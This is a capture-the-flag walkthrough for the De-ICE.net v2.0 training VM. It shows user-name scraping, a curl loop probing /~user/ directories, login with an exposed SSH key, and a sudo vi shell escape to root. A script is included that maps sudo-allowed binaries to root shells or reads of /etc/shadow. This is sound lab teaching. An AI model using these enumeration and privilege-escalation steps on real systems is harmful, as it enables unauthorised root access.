Walkthrough for De-ICE.net v2.0

I am glad to have completed the De-ICE challenge, though I needed to consult a few references along the way. Still, it was a good start.

Let's cut to the chase and get to work.

What is De-ICE ?

The answer to that question is here. To download a copy of the live OS:

de-ice.net-2.100-1.0.iso

 

Walkthrough

I used Kali Linux for this walkthrough. First, I used the netdiscover command in Kali to discover the IP address of the De-ICE machine.

[Screenshot: netdiscover output]

The IPs discovered were 192.168.2.100 and 192.168.2.101.

I ran an nmap scan against both targets.

[Screenshot: nmap scan]

Since this is a walkthrough, I am going to skip the "I did this, I did that" and stick to the next step.

I visited the web app on port 80 of 192.168.2.100 and found this list of email IDs (I shortlisted them, since they could be user IDs for login).

[Screenshot: browsing the page]

I wrote a simple shell one-liner that extracts all the usernames from this page.

[Screenshot: username enumeration]

Here is the code :

# keep the lines containing '@', take what follows the '-', then drop the '@domain' part
grep '@' index2.html | cut -d '-' -f2 | cut -d '@' -f1 > username.txt

This gave me a list of all the usernames I thought could plausibly exist on the box.

I then tried many combinations against 192.168.2.100 but did not get any useful results.

However, 192.168.2.101 was interesting. I ran a nikto scan on it and found the following result.

[Screenshot: nikto scan]

It reported directory indexing on /~root/ and /root/, so I thought the username list could be used for enumeration in this scenario, in the form /~(username)/.

[Screenshot: directory indexing]

 

I quickly edited the username file, prepending ~ to every name in it, and passed the list as the payload in Burp Intruder.

[Screenshot: Burp Suite Intruder]

That paid off: I got a 200 response for a few usernames.

[Screenshot: Burp Suite detecting pirrip]
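The two steps above (scraping user names from the contact page, then trying /~name/ on the second host) as one added shell script. This is example code written for this walkthrough, not the post's own one-liner or its Burp configuration. The HTML and the example.org addresses are constructed sample input shaped like the De-ICE contact page; the target host is read from a DEICE_TARGET variable invented for this example, and the probe only runs when that variable is set, since it needs the live VM.

```shell
#!/bin/sh
# Added example (not from the original post): scrape user names from a page
# that lists e-mail addresses, turn them into /~user/ paths and probe a host
# for per-user web directories.

# Constructed sample input, laid out like the De-ICE contact page
# ("Name - user@domain"). One duplicate and one line without the '-'
# separator are included on purpose.
SAMPLE_HTML=$(mktemp)
trap 'rm -f "$SAMPLE_HTML"' EXIT
cat > "$SAMPLE_HTML" <<'EOF'
<html><body>
<h2>Contact</h2>
<p>Philip Pirrip - pirrip@example.org</p>
<p>Abel Magwitch - magwitch@example.org</p>
<p>Miss Havisham - havisham@example.org</p>
<p>Philip Pirrip (alt) - pirrip@example.org</p>
<p>Webmaster: webmaster@example.org</p>
</body></html>
EOF

# Print the local part of every e-mail address in the file, one per line,
# de-duplicated. The regex does not depend on how each line is laid out,
# unlike a fixed cut on '-'.
extract_usernames() {
    grep -oE '[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}' "$1" |
        cut -d '@' -f1 | sort -u
}

# Turn names on stdin into Apache userdir paths (/~name/).
make_home_paths() {
    sed 's|^|/~|; s|$|/|'
}

# Probe http://host<path> for each path on stdin and print the ones that
# answer 200 (directory listing) or 403 (exists but forbidden). Needs a
# live target, so it is only run when DEICE_TARGET is set.
probe_homes() {
    host=$1
    while IFS= read -r path; do
        code=$(curl -s -o /dev/null -w '%{http_code}' "http://$host$path")
        case $code in
            200|403) printf '%s %s\n' "$code" "$path" ;;
        esac
    done
}

if [ -n "${DEICE_TARGET:-}" ]; then
    extract_usernames "$SAMPLE_HTML" | make_home_paths | probe_homes "$DEICE_TARGET"
else
    # Offline: just show the candidate paths that would be probed.
    extract_usernames "$SAMPLE_HTML" | make_home_paths
fi
```

Run it as `DEICE_TARGET=192.168.2.101 sh enum_homes.sh` against the VM. Compared with `cut -d '-'`, the address regex also handles lines that lack the dash (the Webmaster line here), and `sort -u` drops the duplicate. Treat a 403 as a hit as well: with mod_userdir, Apache usually answers 403 when the user's directory exists but is not listable and 404 when there is no such user, so a 403 still confirms the account name.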

Based on this, it was time for another nikto scan to crawl and find things under these directories: /~havisham/, /~pirrip/ and /~magwitch/. Cutting to the chase, here is the one for /~pirrip/.

[Screenshot: nikto finding .ssh under /~pirrip/]

Nikto detected a .ssh folder. Bingo: it held an RSA private and public key pair.

[Screenshot: the .ssh directory listing]

I downloaded both files, set the permissions (the private key must be 0600, or ssh refuses to use it), moved them into the /root/.ssh/ folder on my own machine, and then connected with ssh.

[Screenshot: ssh login as pirrip]

Browsing through the mail on the server I had logged into, I found a password for pirrip.

[Screenshot: browsing the mail]

0l1v3rTw1st. Nice password, eh?

I then used this password with sudo (sudo -l) to see which commands the user is allowed to run.

[Screenshot: checking sudo permissions]

So we can see vi, cat, tail and more. Here, however, cat did not let me view the shadow file, but vi did let me open it.

[Screenshot: spawning /bin/bash from vi]

You could now crack the passwords, or even replace the hashes with ones you know. But here is the trick I learnt from other blogs: since vi was opened through sudo, the editor itself is running as root. So instead of saving the file, look at the command I entered: I invoked a shell from inside vi (:!/bin/bash), and guess what happened.

[Screenshot: root shell]
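A small triage script for the sudo -l step, added here as an example and not the post's own commands: it parses sudo -l output and says, for each permitted binary, whether it is known to hand out a shell when run under sudo or only to read files. The sudo -l text is a constructed sample modelled on the four binaries named above (the real listing is only visible in the screenshot), and the escape table is a hand-maintained subset of the techniques GTFOBins documents.

```shell
#!/bin/sh
# Added example, not from the original post: triage `sudo -l` output and map
# each permitted binary to the known way of turning it into a root shell.

# Constructed sample of `sudo -l` output for the pirrip account.
SUDO_L_OUTPUT=$(mktemp)
trap 'rm -f "$SUDO_L_OUTPUT"' EXIT
cat > "$SUDO_L_OUTPUT" <<'EOF'
Matching Defaults entries for pirrip on this host:
    env_reset

User pirrip may run the following commands on this host:
    (ALL) /usr/bin/more, /usr/bin/tail, /usr/bin/vi
    (ALL) NOPASSWD: /usr/bin/cat
EOF

# Print one permitted command entry per line. Keeps only the "(runas) ..."
# lines, drops the runas spec and any NOPASSWD:/SETENV:-style tags, then
# splits the comma-separated list.
sudo_commands() {
    grep -E '^[[:space:]]*\(' "$1" |
        sed -E 's/^[[:space:]]*\([^)]*\)[[:space:]]*//' |
        sed -E 's/(^|[[:space:]])(NOPASSWD|PASSWD|SETENV|NOSETENV|NOEXEC|EXEC):[[:space:]]*/\1/g' |
        tr ',' '\n' |
        sed -E 's/^[[:space:]]+//; s/[[:space:]]+$//' |
        grep -v '^$'
}

# Given a sudoers command entry (path plus optional arguments), print how it
# escapes to a shell when run under sudo. Hand-maintained subset of GTFOBins.
shell_escape() {
    cmd=${1%% *}      # first word: the binary itself
    name=${cmd##*/}   # basename
    case $name in
        vi|vim)    printf ':!/bin/sh\n' ;;        # from the editor's command line
        more|less) printf '!/bin/sh\n' ;;         # at the pager prompt (more needs more than one screen of input)
        cat|tail)  printf 'file read only\n' ;;   # no shell, but dumps /etc/shadow as root
        *)         printf 'unknown\n' ;;
    esac
}

# Print each entry next to its escape.
triage() {
    sudo_commands "$1" | while IFS= read -r entry; do
        printf '%-32s %s\n' "$entry" "$(shell_escape "$entry")"
    done
}

triage "$SUDO_L_OUTPUT"
```

Feed it real output with `sudo -l > sudo.txt` and `triage sudo.txt`. The vi entry is the one that matters on this box: `sudo vi /etc/shadow` followed by `:!/bin/sh` gives a root shell, which is the trick used above. An entry restricted to a particular file (for example `/usr/bin/vi /etc/shadow`) still escapes the same way, because the shell is spawned from the editor regardless of which file it has open.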

Woohoo, root it is.

We have successfully rooted the vulnerable OS.

I will be posting the full sequence of commands in a day or two. That's it for now; I will upload a video soon as well!